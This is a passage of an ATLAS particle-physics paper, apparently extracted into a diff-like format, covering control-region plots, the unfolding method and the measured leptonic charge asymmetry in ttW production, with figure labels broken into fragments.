1335
+
1336
+ CR-HFe,
1337
+ Post-fit
1338
+ Data
1339
+ (QCD)
1340
+ W
1341
+ tt
1342
+ (EW)
1343
+ W
1344
+ tt
1345
+ Z
1346
+ tt
1347
+ e
1348
+ HF
1349
+ µ
1350
+ HF
1351
+ -conv.
1352
+ γ
1353
+ H
1354
+ tt
1355
+ tZq
1356
+ +jets
1357
+ WZ/ZZ
1358
+ Other
1359
+ Uncertainty
1360
+ (a)
1361
+ 15
1362
+ 20
1363
+ 25
1364
+ 30
1365
+ 35
1366
+ 40
1367
+ 45
1368
+ 50
1369
+ [GeV]
1370
+ T
1371
+ 3rd Leading Lepton p
1372
+ 0.5
1373
+ 0.75
1374
+ 1
1375
+ 1.25
1376
+
1377
+ Data / Pred.
1378
+ 0
1379
+ 50
1380
+ 100
1381
+ 150
1382
+ 200
1383
+ 250
1384
+ 300
1385
+ 350
1386
+ 400
1387
+ Events
1388
+ ATLAS
1389
+ -1
1390
+ = 13 TeV, 139 fb
1391
+ s
1392
+ +
1393
+ η
1394
+
1395
+ CR-HFe,
1396
+ Post-fit
1397
+ Data
1398
+ (QCD)
1399
+ W
1400
+ tt
1401
+ (EW)
1402
+ W
1403
+ tt
1404
+ Z
1405
+ tt
1406
+ e
1407
+ HF
1408
+ µ
1409
+ HF
1410
+ -conv.
1411
+ γ
1412
+ H
1413
+ tt
1414
+ tZq
1415
+ +jets
1416
+ WZ/ZZ
1417
+ Other
1418
+ Uncertainty
1419
+ (b)
1420
+ 15
1421
+ 20
1422
+ 25
1423
+ 30
1424
+ 35
1425
+ 40
1426
+ 45
1427
+ 50
1428
+ [GeV]
1429
+ T
1430
+ 3rd Leading Lepton p
1431
+ 0.5
1432
+ 0.75
1433
+ 1
1434
+ 1.25
1435
+
1436
+ Data / Pred.
1437
+ 0
1438
+ 50
1439
+ 100
1440
+ 150
1441
+ 200
1442
+ 250
1443
+ 300
1444
+ 350
1445
+ 400
1446
+ Events
1447
+ ATLAS
1448
+ -1
1449
+ = 13 TeV, 139 fb
1450
+ s
1451
+
1452
+ η
1453
+
1454
+ ,
1455
+ µ
1456
+ CR-HF
1457
+ Post-fit
1458
+ Data
1459
+ (QCD)
1460
+ W
1461
+ tt
1462
+ (EW)
1463
+ W
1464
+ tt
1465
+ Z
1466
+ tt
1467
+ e
1468
+ HF
1469
+ µ
1470
+ HF
1471
+ -conv.
1472
+ γ
1473
+ H
1474
+ tt
1475
+ tZq
1476
+ +jets
1477
+ WZ/ZZ
1478
+ Other
1479
+ Uncertainty
1480
+ (c)
1481
+ 15
1482
+ 20
1483
+ 25
1484
+ 30
1485
+ 35
1486
+ 40
1487
+ 45
1488
+ 50
1489
+ [GeV]
1490
+ T
1491
+ 3rd Leading Lepton p
1492
+ 0.5
1493
+ 0.75
1494
+ 1
1495
+ 1.25
1496
+
1497
+ Data / Pred.
1498
+ 0
1499
+ 50
1500
+ 100
1501
+ 150
1502
+ 200
1503
+ 250
1504
+ 300
1505
+ 350
1506
+ 400
1507
+ Events
1508
+ ATLAS
1509
+ -1
1510
+ = 13 TeV, 139 fb
1511
+ s
1512
+ +
1513
+ η
1514
+
1515
+ ,
1516
+ µ
1517
+ CR-HF
1518
+ Post-fit
1519
+ Data
1520
+ (QCD)
1521
+ W
1522
+ tt
1523
+ (EW)
1524
+ W
1525
+ tt
1526
+ Z
1527
+ tt
1528
+ e
1529
+ HF
1530
+ µ
1531
+ HF
1532
+ -conv.
1533
+ γ
1534
+ H
1535
+ tt
1536
+ tZq
1537
+ +jets
1538
+ WZ/ZZ
1539
+ Other
1540
+ Uncertainty
1541
+ (d)
1542
+ Figure 2: Comparison between data and the post-fit predictions in (a,b) CR-HF𝑒 and (c,d) CR-HF𝜇. The distributions
1543
+ show the 𝑝T of the third lepton (electron or muon), which is the variable that is used for the binned likelihood
1544
+ fit. The regions are separated between Δ𝜂ℓ
1545
+ BDT ≤ 0 (Δ𝜂−) and Δ𝜂ℓ
1546
+ BDT > 0 (Δ𝜂+). The error bands include the total
1547
+ uncertainties in the post-fit predictions. The ratios of the data to the total post-fit predictions are shown in the lower
1548
+ panels. Events with the 𝑝T of the third lepton above 50 GeV are included in the rightmost bins.
1549
+ 17
1550
+
1551
+ 200
1552
+ 300
1553
+ 400
1554
+ 500
1555
+ 600
1556
+ 700
1557
+ 800
1558
+ 900
1559
+ 1000
1560
+ [GeV]
1561
+ T
1562
+ H
1563
+ 0.5
1564
+ 0.75
1565
+ 1
1566
+ 1.25
1567
+
1568
+ Data / Pred.
1569
+ 0
1570
+ 20
1571
+ 40
1572
+ 60
1573
+ 80
1574
+ 100
1575
+ Events
1576
+ ATLAS
1577
+ -1
1578
+ = 13 TeV, 139 fb
1579
+ s
1580
+
1581
+ η
1582
+
1583
+ Z,
1584
+ tt
1585
+ CR-
1586
+ Post-fit
1587
+ Data
1588
+ (QCD)
1589
+ W
1590
+ tt
1591
+ (EW)
1592
+ W
1593
+ tt
1594
+ Z
1595
+ tt
1596
+ µ
1597
+ HF
1598
+ -conv.
1599
+ γ
1600
+ H
1601
+ tt
1602
+ tZq
1603
+ +jets
1604
+ WZ/ZZ
1605
+ Other
1606
+ Uncertainty
1607
+ (a)
1608
+ 200
1609
+ 300
1610
+ 400
1611
+ 500
1612
+ 600
1613
+ 700
1614
+ 800
1615
+ 900
1616
+ 1000
1617
+ [GeV]
1618
+ T
1619
+ H
1620
+ 0.5
1621
+ 0.75
1622
+ 1
1623
+ 1.25
1624
+
1625
+ Data / Pred.
1626
+ 0
1627
+ 20
1628
+ 40
1629
+ 60
1630
+ 80
1631
+ 100
1632
+ 120
1633
+ Events
1634
+ ATLAS
1635
+ -1
1636
+ = 13 TeV, 139 fb
1637
+ s
1638
+ +
1639
+ η
1640
+
1641
+ Z,
1642
+ tt
1643
+ CR-
1644
+ Post-fit
1645
+ Data
1646
+ (QCD)
1647
+ W
1648
+ tt
1649
+ (EW)
1650
+ W
1651
+ tt
1652
+ Z
1653
+ tt
1654
+ µ
1655
+ HF
1656
+ -conv.
1657
+ γ
1658
+ H
1659
+ tt
1660
+ tZq
1661
+ +jets
1662
+ WZ/ZZ
1663
+ Other
1664
+ Uncertainty
1665
+ (b)
1666
+
1667
+ η
1668
+
1669
+ +
1670
+ η
1671
+
1672
+ 0.6
1673
+ 0.8
1674
+ 1
1675
+ 1.2
1676
+ 1.4
1677
+ Data / Pred.
1678
+ 10
1679
+ 20
1680
+ 30
1681
+ 40
1682
+ 50
1683
+ 60
1684
+ 70
1685
+ 80
1686
+ 90
1687
+ Events
1688
+ ATLAS
1689
+ -1
1690
+ = 13 TeV, 139 fb
1691
+ s
1692
+ -conv
1693
+ γ
1694
+ CR-
1695
+ Post-fit
1696
+ Data
1697
+ (QCD)
1698
+ W
1699
+ tt
1700
+ (EW)
1701
+ W
1702
+ tt
1703
+ Z
1704
+ tt
1705
+ e
1706
+ HF
1707
+ µ
1708
+ HF
1709
+ -conv.
1710
+ γ
1711
+ H
1712
+ tt
1713
+ tZq
1714
+ +jets
1715
+ WZ/ZZ
1716
+ Other
1717
+ Uncertainty
1718
+ (c)
1719
+ Figure 3: Comparison between data and the post-fit predictions in (a,b) CR-𝑡¯𝑡𝑍 and (c) CR-𝛾-conv. The distributions
1720
+ are shown for the variables that are used for the binned likelihood fit: 𝐻T for CR-𝑡¯𝑡𝑍 and the total event yields for
1721
+ CR-𝛾-conv. The regions are separated between Δ𝜂ℓ
1722
+ BDT ≤ 0 (Δ𝜂−) and Δ𝜂ℓ
1723
+ BDT > 0 (Δ𝜂+). The error bands include the
1724
+ total uncertainties in the post-fit predictions. The ratios of the data to the total post-fit predictions are shown in the
1725
+ lower panels. Events with an 𝐻T above 1 TeV are included in the rightmost bins of (a) and (b).
1726
+ 18
1727
+
1728
+
1729
+ η
1730
+
1731
+ ,
1732
+ jets
1733
+ N
1734
+ -low
1735
+ b
1736
+ SR-1
1737
+ +
1738
+ η
1739
+
1740
+ ,
1741
+ jets
1742
+ N
1743
+ -low
1744
+ b
1745
+ SR-1
1746
+
1747
+ η
1748
+
1749
+ ,
1750
+ jets
1751
+ N
1752
+ -high
1753
+ b
1754
+ SR-1
1755
+ +
1756
+ η
1757
+
1758
+ ,
1759
+ jets
1760
+ N
1761
+ -high
1762
+ b
1763
+ SR-1
1764
+
1765
+ η
1766
+
1767
+ ,
1768
+ jets
1769
+ N
1770
+ -low
1771
+ b
1772
+ SR-2
1773
+ +
1774
+ η
1775
+
1776
+ ,
1777
+ jets
1778
+ N
1779
+ -low
1780
+ b
1781
+ SR-2
1782
+
1783
+ η
1784
+
1785
+ ,
1786
+ jets
1787
+ N
1788
+ -high
1789
+ b
1790
+ SR-2
1791
+ +
1792
+ η
1793
+
1794
+ ,
1795
+ jets
1796
+ N
1797
+ -high
1798
+ b
1799
+ SR-2
1800
+ 0.6
1801
+ 0.8
1802
+ 1
1803
+ 1.2
1804
+ 1.4
1805
+ Data / Pred.
1806
+ 20
1807
+ 40
1808
+ 60
1809
+ 80
1810
+ 100
1811
+ 120
1812
+ 140
1813
+ 160
1814
+ 180
1815
+ 200
1816
+ Events
1817
+ ATLAS
1818
+ -1
1819
+ = 13 TeV, 139 fb
1820
+ s
1821
+ SR summary
1822
+ Post-fit
1823
+ Data
1824
+ (QCD)
1825
+ W
1826
+ tt
1827
+ (EW)
1828
+ W
1829
+ tt
1830
+ Z
1831
+ tt
1832
+ e
1833
+ HF
1834
+ µ
1835
+ HF
1836
+ -conv.
1837
+ γ
1838
+ H
1839
+ tt
1840
+ tZq
1841
+ +jets
1842
+ WZ/ZZ
1843
+ Other
1844
+ Uncertainty
1845
+ Figure 4: Comparison between data and the post-fit predictions for Δ𝜂ℓ
1846
+ BDT ≤ 0 (Δ𝜂−) and Δ𝜂ℓ
1847
+ BDT > 0 (Δ𝜂+) in the
1848
+ four SRs. The error band includes the total uncertainties of the post-fit predictions. The ratio of the data to the total
1849
+ post-fit predictions is shown in the lower panel.
1850
+ 9.1 Particle-level objects
1851
+ Particle-level objects in simulated events are defined using quasi-stable particles (with a mean lifetime
1852
+ greater than 30 ps) originating from 𝑝𝑝 collisions. They are selected after hadronisation but before the
1853
+ interaction with the various detector components or consideration of pile-up effects.
1854
+ Particle-level electrons or muons are required to not originate from a hadron in the MC generator
1855
+ event record, whether directly or through a 𝜏-lepton decay. This ensures that they originate from a 𝑍
1856
+ or 𝑊 boson (where the 𝑊 boson can come either from prompt 𝑊 production or a top-quark decay),
1857
+ without requiring a direct match with the parent particle. The four-momenta of the bare leptons are
1858
+ modified (‘dressed’) by adding the four-momenta of all radiated photons within a cone of size Δ𝑅 = 0.1,
1859
+ excluding photons from hadron decays, to take into account FSR photons.
1860
+ Particle-level jets are reconstructed with the anti-𝑘𝑡 algorithm with a radius parameter of 𝑅 = 0.4 applied to
1861
+ all stable particles, but excluding the neutrinos originating from 𝑊 or 𝑍 bosons and the selected electrons,
1862
+ muons and photons used in the definition of the charged leptons. If 𝑏-hadrons with 𝑝T > 5 GeV are found
1863
+ in the MC event record, they are clustered into stable-particle jets with their energies set to negligible
1864
+ positive values (referred to as ‘ghost-matching’) [83]. Particle-level jets containing at least one of these
1865
+ 𝑏-hadrons are considered as 𝑏-jets. The particle-level missing transverse momentum is defined as the
1866
+ vectorial sum of the transverse momenta of all neutrinos found in the MC simulation history of the event,
1867
+ excluding those originating from hadron decays.
1868
+ 19
1869
+
1870
+ 0
1871
+ 0.5
1872
+ 1
1873
+ 1.5
1874
+ 2
1875
+ 2.5
1876
+ 3
1877
+ 3.5
1878
+ ATLAS
1879
+ -1
1880
+ = 13 TeV, 139 fb
1881
+ s
1882
+ )
1883
+ W
1884
+ tt
1885
+ (
1886
+ l
1887
+ c
1888
+ A
1889
+ 0.14
1890
+ ±
1891
+ -0.12
1892
+ )
1893
+
1894
+ η
1895
+
1896
+ (
1897
+ e
1898
+
1899
+ -conv
1900
+ γ
1901
+ N
1902
+ 0.34
1903
+ ±
1904
+ 0.74
1905
+ )
1906
+ +
1907
+ η
1908
+
1909
+ (
1910
+ e
1911
+
1912
+ -conv
1913
+ γ
1914
+ N
1915
+ 0.40
1916
+ ±
1917
+ 1.27
1918
+ )
1919
+
1920
+ η
1921
+
1922
+ (
1923
+ e
1924
+
1925
+ HF
1926
+ N
1927
+ 0.09
1928
+ ±
1929
+ 0.83
1930
+ )
1931
+ +
1932
+ η
1933
+
1934
+ (
1935
+ e
1936
+
1937
+ HF
1938
+ N
1939
+ 0.08
1940
+ ±
1941
+ 0.98
1942
+ )
1943
+
1944
+ η
1945
+
1946
+ (
1947
+ µ
1948
+
1949
+ HF
1950
+ N
1951
+ 0.09
1952
+ ±
1953
+ 0.98
1954
+ )
1955
+ +
1956
+ η
1957
+
1958
+ (
1959
+ µ
1960
+
1961
+ HF
1962
+ N
1963
+ 0.10
1964
+ ±
1965
+ 1.04
1966
+ )
1967
+
1968
+ η
1969
+
1970
+ (
1971
+ Z
1972
+ tt
1973
+ N
1974
+ 0.14
1975
+ ±
1976
+ 1.05
1977
+ )
1978
+ +
1979
+ η
1980
+
1981
+ (
1982
+ Z
1983
+ tt
1984
+ N
1985
+ 0.15
1986
+ ±
1987
+ 1.28
1988
+ )
1989
+
1990
+ η
1991
+
1992
+ (
1993
+ W
1994
+ tt
1995
+ N
1996
+ 0.40
1997
+ ±
1998
+ 1.59
1999
+ Figure 5: Normalisation factors for the major background processes, together with NΔ𝜂− for 𝑡¯𝑡𝑊 and the 𝐴ℓ
2000
+ c value
2001
+ extracted from the fit to data in the CRs and SRs. The normalisation factors, N𝑡 ¯𝑡𝑍, N𝑒
2002
+ 𝛾-conv, N𝑒
2003
+ HF and N 𝜇
2004
+ HF, are
2005
+ obtained separately for Δ𝜂ℓ
2006
+ BDT ≤ 0 (Δ𝜂−) and Δ𝜂ℓ
2007
+ BDT > 0 (Δ𝜂+). The indicated uncertainties consider statistical as
2008
+ well as systematic uncertainties. The solid vertical line in the last entry shows the 𝐴ℓ
2009
+ c SM expectation, calculated
2010
+ using the 𝑡¯𝑡𝑊 Sherpa simulation.
2011
+ 9.2 Particle-level fiducial volume
2012
+ The particle-level fiducial volume is defined by the following requirements on the particle-level objects, as
2013
+ defined in Section 9.1:
2014
+ • Three electrons or muons with 𝑝T > 15 GeV and |𝜂| < 2.5.
2015
+ • The invariant mass of all OSSF lepton pairs has to be larger than 25 GeV.
2016
+ • No 𝑍-candidate (as defined in Section 5) among the leptons.
2017
+ • At least two jets with 𝑝T > 20 GeV, |𝜂| < 2.5 and least one of them identified as a 𝑏-jet.
2018
+ 9.3 Unfolding procedure and charge-asymmetry extraction
2019
+ The unfolding procedure is applied to the observed number of data events in the SRs. Analogously
2020
+ to the method used at detector level, described in Section 6, a method of matching leptons to top
2021
+ quarks (antiquarks) is required to obtain the response matrix, essential to the unfolding procedure. To
2022
+ reproduce the particle-level fiducial volume, a simpler scheme is adopted that is independent of the
2023
+ generator-specific MC event record and any multivariate algorithm. Each lepton is combined with the
2024
+ 20
2025
+
2026
+ closest 𝑏-jet in the Δ𝑅 space. The ℓ–𝑏 system that yields a mass closest to the most probable mass for a
2027
+ ℓ–𝑏 system originating from a top-quark decay (according to the nominal 𝑡¯𝑡𝑊 simulation) is used to select
2028
+ the even and odd leptons. This procedure has an efficiency of approximately 65% to identify the correct
2029
+ leptons.
2030
+ The following formula is used for the unfolding:
2031
+ 𝑁folded
2032
+ 𝑖
2033
+ = 1
2034
+ 𝛼𝑖
2035
+ ∑︁
2036
+ 𝑗
2037
+ 𝜀 𝑗 𝑀𝑖 𝑗
2038
+ ��������������������������
2039
+ 𝑅𝑖 𝑗
2040
+ 𝑁fid
2041
+ 𝑗
2042
+ with
2043
+ 𝑀𝑖 𝑗 =
2044
+ 𝑁 (reco ∩ fid)
2045
+ 𝑖 𝑗
2046
+ 𝑁 (reco ∩ fid)
2047
+ 𝑗
2048
+ ,
2049
+ 𝛼𝑖 = 𝑁 (reco ∩ fid)
2050
+ 𝑖
2051
+ 𝑁reco
2052
+ 𝑖
2053
+ ,
2054
+ 𝜀 𝑗 =
2055
+ 𝑁 (reco ∩ fid)
2056
+ 𝑗
2057
+ 𝑁fid
2058
+ 𝑗
2059
+ ,
2060
+ (3)
2061
+ with the number 𝑁fid
2062
+ 𝑗
2063
+ representing the content of bin 𝑗 after the unfolding procedure. The response
2064
+ matrix (𝑅𝑖 𝑗) is constructed from the migration matrix (𝑀𝑖 𝑗) and the acceptance and efficiency correction
2065
+ terms (𝛼𝑖 and 𝜀 𝑗) for each bin. The entries in the migration matrix represent the fractions of events at
2066
+ particle level in a 𝑦-axis bin that are reconstructed at detector level in an 𝑥-axis bin. They are normalised
2067
+ such that the sum of entries in each row is equal to one. The acceptance corrections 𝛼𝑖 account for events
2068
+ that are generated outside the fiducial volume (‘fid’) but satisfy the selection at detector level (‘reco’), as
2069
+ described in Section 5. The efficiency corrections 𝜀 𝑗 account for events that are in the fiducial volume
2070
+ but fail to satisfy the detector-level selection. The symbol ∩ represents the logical intersection of the two
2071
+ regions.
2072
+ The migration matrices, as well as the acceptance and efficiency correction terms, are built separately for
2073
+ each of the SRs defined in Table 1. As an example, Figure 6 shows (a) the migration matrix, as well as
2074
+ (b) the efficiency and (c) the acceptance correction factors that are used for SR-2𝑏-low𝑁jets, which is the
2075
+ region with the highest 𝑡¯𝑡𝑊 purity. The fraction of events in the diagonal elements of the migration matrix
2076
+ shows the quality of the resolution for Δ𝜂ℓ, which is around 90%. The efficiency corrections are at a level
2077
+ of 11%–12% and the acceptance corrections are around 95%. None show any notable dependence on
2078
+ Δ𝜂ℓ.
2079
+ The unfolding procedure is the same as in Ref. [18] and based on a profile-likelihood approach (‘profile-
2080
+ likelihood unfolding’). With this approach, the unfolding problem is transformed into a standard problem
2081
+ of fitting normalisations of distributions. Each bin in the particle-level distribution is ‘folded’ through the
2082
+ response matrix via Eq. (3), resulting in the same numbers of bins at detector level. The particle-level bins
2083
+ are treated as separate subsamples that are multiplied by their respective entries in the response matrix and
2084
+ freely floating parameters are assigned to each of these subsamples at detector level. Analogously to the fit
2085
+ described in Section 8, the freely floating parameters are assigned to the major backgrounds in the SRs:
2086
+ N𝑡 ¯𝑡𝑍, N𝑒
2087
+ 𝛾-conv, N𝑒
2088
+ HF and N 𝜇
2089
+ HF. These normalisations and the analysis regions are split into Δ𝜂+ and Δ𝜂−, in
2090
+ the same way as the detector-level results. Thus, the detector-level distributions are scaled by some factors,
2091
+ determined by fitting the data, and these factors are then used to scale the corresponding particle-level bins,
2092
+ which gives the desired unfolded result. The charge asymmetry is defined as the parameter of interest and
2093
+ is related to the normalisation factors in the unfolded bins. For the CRs, no response matrices are built.
2094
+ However, as the signal contamination in these regions is very small compared with the total event yields,
2095
+ an approximation is made whereby the signal is treated as an additional background. An exception is
2096
+ CR-𝛾-conv where, due to the high signal contamination, response matrices are also built. No regularisation
2097
+ is applied in the unfolding.
2098
+ The systematic uncertainties in the signal and background processes considered for the unfolded results
2099
+ are the same as for the results at detector level (described in Section 7). Systematic uncertainties in the
2100
+ 21
2101
+
2102
+ 10
2103
+ 20
2104
+ 30
2105
+ 40
2106
+ 50
2107
+ 60
2108
+ 70
2109
+ 80
2110
+ 90
2111
+ [%]
2112
+ 1.1
2113
+ ±
2114
+ 91.5
2115
+ 0.3
2116
+ ±
2117
+ 8.5
2118
+ 0.4
2119
+ ±
2120
+ 11.8
2121
+ 1.2
2122
+ ±
2123
+ 88.2
2124
+
2125
+ η
2126
+
2127
+ +
2128
+ η
2129
+
2130
+ Detector-level
2131
+
2132
+ η
2133
+
2134
+ +
2135
+ η
2136
+
2137
+ Particle-level
2138
+ ATLAS
2139
+ -1
2140
+ = 13 TeV, 139 fb
2141
+ s
2142
+ Simulation,
2143
+ (a)
2144
+
2145
+ η
2146
+
2147
+ +
2148
+ η
2149
+
2150
+ 0.09
2151
+ 0.1
2152
+ 0.11
2153
+ 0.12
2154
+ 0.13
2155
+ Efficiency
2156
+ ATLAS Simulation
2157
+ -1
2158
+ = 13 TeV, 139 fb
2159
+ s
2160
+ (b)
2161
+
2162
+ η
2163
+
2164
+ +
2165
+ η
2166
+
2167
+ 0.8
2168
+ 0.85
2169
+ 0.9
2170
+ 0.95
2171
+ 1
2172
+ 1.05
2173
+ 1.1
2174
+ Acceptance
2175
+ ATLAS Simulation
2176
+ -1
2177
+ = 13 TeV, 139 fb
2178
+ s
2179
+ (c)
2180
+ Figure 6: (a) The migration matrix and (b,c) the efficiency/acceptance corrections that are used as input for the
2181
+ unfolding of SR-2𝑏-low𝑁jets. The matrices are normalised such that the sum of any given row is 100%, although
2182
+ small differences may be present due to rounding. The error bars of the efficiency/acceptance correction terms
2183
+ represent the MC statistical uncertainties per bin based on the nominal 𝑡¯𝑡𝑊 Sherpa sample.
2184
+ 22
2185
+
2186
+ background processes are propagated to the unfolded distributions by varying the detector-level distributions
2187
+ within their uncertainties and repeating the unfolding procedure. The modelling uncertainties of the 𝑡¯𝑡𝑊
2188
+ signal are propagated through the unfolding procedure, using variations of the response matrices.
2189
+ An injection test is performed to verify that non-SM 𝐴ℓ
2190
+ c values can be recovered in the unfolding procedure.
2191
+ This is done by injecting the non-SM 𝐴ℓ
2192
+ c values into the particle-level predictions, which are propagated to
2193
+ detector level and treated as pseudo-data in the fit. The unfolding procedure is then performed on this
2194
+ pseudo-data for several positive and negative deviations from the SM 𝐴ℓ
2195
+ c to compute the relation between
2196
+ the injected and extracted 𝐴ℓ
2197
+ c values and to estimate the bias that the fit procedure introduces. After the fit
2198
+ to real data, the observed 𝐴ℓ
2199
+ c is substituted into the relation to extract the bias. The bias estimated from this
2200
+ procedure is found to be 0.004. Although this value is well covered by the systematic uncertainties, it is
2201
+ added as an extra uncertainty in the unfolded 𝐴ℓ
2202
+ c value to account for this effect.
2203
+ The charge asymmetry value, unfolded to particle level (PL) in the fiducial volume defined in Section 9.2,
2204
+ is found to be
2205
+ 𝐴ℓ
2206
+ c (𝑡¯𝑡𝑊)PL = −0.112 ± 0.170 (stat.) ± 0.054 (syst.),
2207
+ with a SM expectation calculated using the nominal 𝑡¯𝑡𝑊 Sherpa simulation of
2208
+ 𝐴ℓ
2209
+ c (𝑡¯𝑡𝑊)PL
2210
+ SM = −0.063 +0.007
2211
+ −0.004 (scale) ± 0.004 (MC stat.).
2212
+ The nominal values for the background normalisations are the same as reported in Section 8. The
2213
+ contributions from the most relevant uncertainties in the charge asymmetry at particle level are given in
2214
+ Table 5. The sources of uncertainty are similar to the ones reported in Table 4, with the Δ𝜂± CR-dependency,
2215
+ the modelling of the 𝑡¯𝑡𝑊 and 𝑡¯𝑡𝑍 MC processes and the statistical uncertainty being the dominant ones.
2216
+ The statistical uncertainty is slightly increased relative to the detector-level result due to the unfolding
2217
+ procedure.
2218
+ 10 Conclusions
2219
+ This paper presents a search for the leptonic charge asymmetry in 𝑡¯𝑡𝑊 production using 𝑝𝑝 collision data at
2220
+ √𝑠 = 13 TeV with the full Run 2 data sample collected with the ATLAS detector at the LHC, corresponding
2221
+ to an integrated luminosity of 139 fb−1. The leptonic charge asymmetry is defined as the pseudorapidity
2222
+ difference between the two reconstructed charged leptons associated with top quarks (or top antiquarks).
2223
+ The search is performed in 3ℓ final states using reconstructed light leptons (electrons or muons), together
2224
+ with jets and 𝑏-jets. To correctly match the leptons to either top quarks or top antiquarks, a technique based
2225
+ on a BDT is used.
2226
+ The charge asymmetry at reconstruction level is obtained by performing a simultaneous profile-likelihood
2227
+ fit to data in different signal and control regions optimised for either the 𝑡¯𝑡𝑊 process or the major SM
2228
+ background processes (𝑡¯𝑡𝑍, non-prompt leptons from HF decays or electrons from 𝛾-conversions). The
2229
+ charge asymmetry is extracted together with the normalisations for these background processes and is
2230
+ found to be
2231
+ 𝐴ℓ
2232
+ c (𝑡¯𝑡𝑊) = −0.123 ± 0.136 (stat.) ± 0.051 (syst.).
2233
+ This is consistent with the SM expectation of
2234
+ 𝐴ℓ
2235
+ c (𝑡¯𝑡𝑊)SM = −0.084 +0.005
2236
+ −0.003 (scale) ± 0.006 (MC stat.),
2237
+ 23
2238
+
2239
+ Table 5: List of the most relevant systematic and statistical uncertainties in the leptonic charge asymmetry at particle
2240
+ level 𝐴ℓ
2241
+ c (𝑡¯𝑡𝑊)PL. For this table, the uncertainties are symmetrised and grouped into categories. The sum in quadrature
2242
+ of the individual uncertainties is not necessarily equal to the total uncertainty due to correlations introduced by the fit.
2243
+ Δ𝐴ℓc (𝑡 ¯𝑡𝑊 )PL
2244
+ Experimental uncertainties
2245
+ Leptons
2246
+ 0.014
2247
+ Jet energy resolution
2248
+ 0.011
2249
+ Pile-up
2250
+ 0.008
2251
+ Jet energy scale
2252
+ 0.004
2253
+ 𝐸miss
2254
+ T
2255
+ 0.002
2256
+ Luminosity
2257
+ 0.001
2258
+ Jet vertex tagger
2259
+ 0.001
2260
+ MC modelling uncertainties
2261
+ 𝑡 ¯𝑡𝑊 modelling
2262
+ 0.022
2263
+ 𝑡 ¯𝑡𝑍 modelling
2264
+ 0.017
2265
+ HF𝑒/𝜇 modelling
2266
+ 0.015
2267
+ Others modelling
2268
+ 0.015
2269
+ 𝑊 𝑍/𝑍 𝑍 + jets modelling
2270
+ 0.014
2271
+ 𝑡 ¯𝑡𝐻 modelling
2272
+ 0.006
2273
+ Other uncertainties
2274
+ Unfolding bias
2275
+ 0.004
2276
+ Δ𝜂± CR-dependency
2277
+ 0.039
2278
+ MC statistical uncertainty
2279
+ 0.027
2280
+ Response matrix
2281
+ 0.009
2282
+ Data statistical uncertainty
2283
+ 0.170
2284
+ Total uncertainty
2285
+ 0.179
2286
+ calculated using the nominal 𝑡¯𝑡𝑊 Sherpa simulation. An unfolding procedure is used to obtain the
2287
+ charge asymmetry at particle level in a specific fiducial volume in the 3ℓ channel. The unfolding is based
2288
+ on a profile-likelihood approach, where the unfolding is performed together with fitting normalisations
2289
+ of the major background processes, using the same procedure used to derive the charge asymmetry at
2290
+ reconstruction level. The charge asymmetry at particle level yields
2291
+ 𝐴ℓ
2292
+ c (𝑡¯𝑡𝑊)PL = −0.112 ± 0.170 (stat.) ± 0.054 (syst.),
2293
+ with a SM expectation calculated using the nominal 𝑡¯𝑡𝑊 Sherpa simulation of
2294
+ 𝐴ℓ
2295
+ c (𝑡¯𝑡𝑊)PL
2296
+ SM = −0.063 +0.007
2297
+ −0.004 (scale) ± 0.004 (MC stat.).
2298
+ The most relevant systematic uncertainties affecting this search are the Δ𝜂± CR-dependency of the fit, as
2299
+ well as the modelling uncertainties of the 𝑡¯𝑡𝑊 and 𝑡¯𝑡𝑍 MC processes in the 3ℓ channel. However, both the
2300
+ reconstruction- and particle-level results are severely limited by the statistical uncertainties of the data.
2301
+ 24
2302
+
2303
+ References
2304
+ [1]
2305
+ A. Broggio et al., Top-quark pair hadroproduction in association with a heavy boson at
2306
+ NLO+NNLL including EW corrections, JHEP 08 (2019) 039, arXiv: 1907.04343 [hep-ph].
2307
+ [2]
2308
+ B. Grzadkowski, M. Iskrzynski, M. Misiak and J. Rosiek,
2309
+ Dimension-six terms in the Standard Model Lagrangian, JHEP 10 (2010) 085,
2310
+ arXiv: 1008.4884 [hep-ph].
2311
+ [3]
2312
+ ATLAS Collaboration, Search for squarks and gluinos in final states with same-sign leptons and jets
2313
+ using 139 fb−1 of data collected with the ATLAS detector, JHEP 06 (2020) 046,
2314
+ arXiv: 1909.08457 [hep-ex].
2315
+ [4]
2316
+ ATLAS Collaboration, Search for new phenomena in events with same-charge leptons and 𝑏-jets in
2317
+ 𝑝𝑝 collisions at √𝑠 = 13 TeV with the ATLAS detector, JHEP 12 (2018) 039,
2318
+ arXiv: 1807.11883 [hep-ex].
2319
+ [5]
2320
+ ATLAS Collaboration, Evidence for the associated production of the Higgs boson and a top quark
2321
+ pair with the ATLAS detector, Phys. Rev. D 97 (2018) 072003, arXiv: 1712.08891 [hep-ex].
2322
+ [6]
2323
+ ATLAS Collaboration, Measurement of the 𝑡¯𝑡𝑡¯𝑡 production cross section in 𝑝𝑝 collisions at
2324
+ √𝑠 = 13 TeV with the ATLAS detector, JHEP 11 (2021) 118, arXiv: 2106.11683 [hep-ex].
2325
+ [7]
2326
+ ATLAS Collaboration, Measurement of the 𝑡¯𝑡𝑍 and 𝑡¯𝑡𝑊 cross sections in proton–proton collisions
2327
+ at √𝑠 = 13 TeV with the ATLAS detector, Phys. Rev. D 99 (2019) 072009,
2328
+ arXiv: 1901.03584 [hep-ex].
2329
+ [8]
2330
+ CMS Collaboration, Measurement of the cross section of top quark-antiquark pair production in
2331
+ association with a W boson in proton-proton collisions at √𝑠 = 13 TeV, (2022),
2332
+ arXiv: 2208.06485 [hep-ex].
2333
+ [9]
2334
+ F. Maltoni, M. L. Mangano, I. Tsinikos and M. Zaro,
2335
+ Top-quark charge asymmetry and polarization in 𝑡𝑡𝑊± production at the LHC,
2336
+ Phys. Lett. B 736 (2014) 252, arXiv: 1406.3262 [hep-ph].
2337
+ [10]
2338
+ G. Bevilacqua et al.,
2339
+ NLO QCD corrections to off-shell 𝑡¯𝑡𝑊± production at the LHC: correlations and asymmetries,
2340
+ Eur. Phys. J. C 81 (2021) 675, arXiv: 2012.01363 [hep-ph].
2341
+ [11]
2342
+ I. Brivio and M. Trott, The Standard Model as an Effective Field Theory, Phys. Rept. 793 (2019) 1,
2343
+ arXiv: 1706.08945 [hep-ph].
2344
+ [12]
2345
+ CDF Collaboration,
2346
+ Evidence for a mass dependent forward-backward asymmetry in top quark pair production,
2347
+ Phys. Rev. D 83 (2011) 112003, arXiv: 1101.0034 [hep-ex].
2348
+ [13]
2349
+ CDF and D0 Collaborations, Combined forward-backward asymmetry measurements in top-antitop
2350
